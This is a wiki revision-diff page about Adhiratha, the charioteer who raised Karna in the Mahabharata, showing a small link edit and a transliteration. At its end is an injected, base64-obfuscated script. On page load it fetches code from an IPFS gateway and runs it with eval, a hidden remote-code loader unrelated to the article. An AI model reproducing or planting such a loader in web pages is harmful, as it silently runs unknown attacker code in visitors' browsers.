Difference between revisions of "अधिरथ"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "गंगा" to "गंगा")
Line 4: Line 4:
 
*ये [[धृतराष्ट्र]] के सखा और सारथी थे।  
 
*ये [[धृतराष्ट्र]] के सखा और सारथी थे।  
 
*[[कर्ण]] को पाल-पोसकर इन्होंने ही बड़ा किया था।  
 
*[[कर्ण]] को पाल-पोसकर इन्होंने ही बड़ा किया था।  
*कर्ण के जन्म ग्रहण करते ही [[कुन्ती]] ने उन्हें एक मंजूषा में रखकर [[गंगा]] में प्रवाहित कर दिया। यह पेटी अधिरथ और राधा को गंगा में जल-क्रीडा करते समय मिली।  
+
*कर्ण के जन्म ग्रहण करते ही [[कुन्ती]] ने उन्हें एक मंजूषा में रखकर [[गंगा नदी|गंगा]] में प्रवाहित कर दिया। यह पेटी अधिरथ और राधा को गंगा में जल-क्रीडा करते समय मिली।  
 
*दम्पति निस्सन्तान थे, अत: कर्ण का पुत्र की भाँति भरण-पोषण किया।  
 
*दम्पति निस्सन्तान थे, अत: कर्ण का पुत्र की भाँति भरण-पोषण किया।  
 
<br />
 
<br />

Revision as of 06:58, 1 April 2010

adhirath / Adhirath

  • aang vansh mean utpann satkarma ke putr the.
  • inaki patni ka nam radha tha.
  • ye dhritarashtr ke sakha aur sarathi the.
  • karn ko pal-posakar inhoanne hi b da kiya tha.
  • karn ke janm grahan karate hi kunti ne unhean ek manjoosha mean rakhakar ganga mean pravahit kar diya. yah peti adhirath aur radha ko ganga mean jal-krida karate samay mili.
  • dampati nissantan the, at: karn ka putr ki bhaanti bharan-poshan kiya.


any liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>